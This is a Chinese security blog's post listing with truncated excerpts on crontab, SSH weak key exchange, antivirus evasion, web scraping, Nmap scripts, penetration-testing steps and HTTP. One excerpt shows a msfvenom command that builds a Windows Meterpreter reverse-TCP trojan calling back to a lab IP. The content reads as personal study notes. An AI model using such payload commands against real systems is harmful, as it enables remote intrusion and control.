- 博客(9)
- 资源 (6)
- 收藏
- 关注
RSS订阅原创 Mac crontab使用问题总结
crontab用法:Linux crontab 命令 | 菜鸟教程Linux和Mac的用法基本一致常用命令:crontab -l 查看当前定时任务 crontab -e 编辑定时任务 crontab -r 删除定时任务创建定时任务:开始可以简单尝试crontab 任务是否可以执行,创建一个简单任务,创建后使用crontab -l查看任务是否成功,然后查看date.txt里面有输出没sudo vi crontab -e#每隔一分钟输出date到桌面date.txt中*/1
2022-04-12 15:35:44
2521
原创 SSH 弱密钥交换算法已启用
一、SSH 弱密钥交换算法已启用描述远程 SSH 服务器被配置为允许被认为是弱的密钥交换算法。这是基于 IETF 草案文档 Key Exchange (KEX) Method Updates and Recommendations for Secure Shell (SSH) draft-ietf-curdle-ssh-kex-sha2-20。 第 4 节列出了关于不应该和绝不能启用的密钥交换算法的指南。 这包括:diffie-hellman-group-exchange-sha1diff
2022-03-23 17:47:12
12702
转载 木马免杀方式
前言免杀,又叫免杀毒技术,是反病毒,反间谍的对立面,是一种能使病毒或木马免于被杀毒软件查杀的软件。它除了使病毒木马免于被查杀外,还可以扩增病毒木马的功能,改变病毒木马的行为。免杀的基本特征是破坏特征,有可能是行为特征,只要破坏了病毒与木马所固有的特征,并保证其原有功能没有改变,一次免杀就能完成了。免杀技术也并不是十恶不赦的,例如,在软件保护所用的加密产品(比如壳)中,有一些会被杀毒软件认为是木马病毒;一些安全领域中的部分安全检测产品,也会被杀毒软件误杀,这时就需要免杀技术来应对这些不稳定因素。1、裸
2022-01-05 10:07:20
6297
3
原创 利用python中的正则爬虫
以FreeBuf的首页为例爬取链接和标题# coding:utf-8import requestsfrom bs4 import BeautifulSoupimport redef get_data(): url = "https://www.freebuf.com/" headers = { 'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:94.0) Gecko/2010
2021-12-10 14:58:57
560
原创 利用Python中的Xpath获取节点爬虫
以FreeBuf的首页为例爬取链接和标题import requestsfrom lxml import etreeheaders = { 'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:94.0) Gecko/20100101 Firefox/94.0' }def getTree(url): res = requests.get(url,headers,timeout = 5)
2021-12-09 15:45:48
1078
转载 Nmap脚本总结(看这一篇就够了)
原文地址:http://drops.wooyun.org/tips/21880x01 nmap按脚本分类扫描nmap脚本主要分为以下几类,在扫描时可根据需要设置--script=类别这种方式进行比较笼统的扫描:auth: 负责处理鉴权证书(绕开鉴权)的脚本 broadcast: 在局域网内探查更多服务开启状况,如dhcp/dns/sqlserver等服务 brute: 提供暴力破解方式,针对常见的应用如http/snmp等 default: 使用-sC或-A选项扫描时候默认的脚本,
2021-12-06 09:26:29
4719
原创 渗透测试步骤
#记录一下渗透测试中的一些知识点#渗透测试可以说是模拟黑客入侵的行为,与之不同的是,我们目的是提高系统的安全性,保护系统而进行的测试。常规渗透测试基本步骤,主要分为8个步骤:明确目标、信息收集、漏洞探测、漏洞验证、信息分析、获取所需、文档整理、生成报告。流程如下图所示渗透测试基本流程1. 明确目标确定目标范围、限度、需求等,然后制定渗透测试方案: 确定范围:测试目标ip、域名、内外网、测试账户、子网、旁站等。 确定规则:能渗透到什么程度,允许测试的时间段和周期、能否修
2021-11-15 17:07:04
10337
1
原创 msf制作木马反弹shell提权
记录一下目标在有webshell权限下,利用kali的msf制作木马反弹shell过程。方便以后查看启动kali中的msf┌──(root????SC)-[~]└─# msfconsole生成exe类型反弹型木马,LHOST=kali的ipmsf6 > msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.173.4 LPORT=4444 -f exe -o shell.exe[*] exec: msfvenom -
2021-11-03 11:19:17
2005
原创 关于HTTP/HTTPS
关于HTTP/HTTPS虽然很熟悉,但是其中原理自认为理解还是不够深入。在网上也看了许多关于HTTP/HTTPS的,这里加上自己理解总结了一下常遇到的问题,顺便巩固一下,方便以后忘记了来查看。一、HTTPHTTP(Hypertext Transfer Prtcl)超文本传输协议是基于TCP/IP协议的应用层协议,主要规定了客户端和服务端之间的通信格式,默认80端口(浏览器默认)。请求报文格式<method><request-URL><version>&
2021-10-22 11:00:18
780
空空如也
TA创建的收藏夹 TA关注的收藏夹
TA关注的人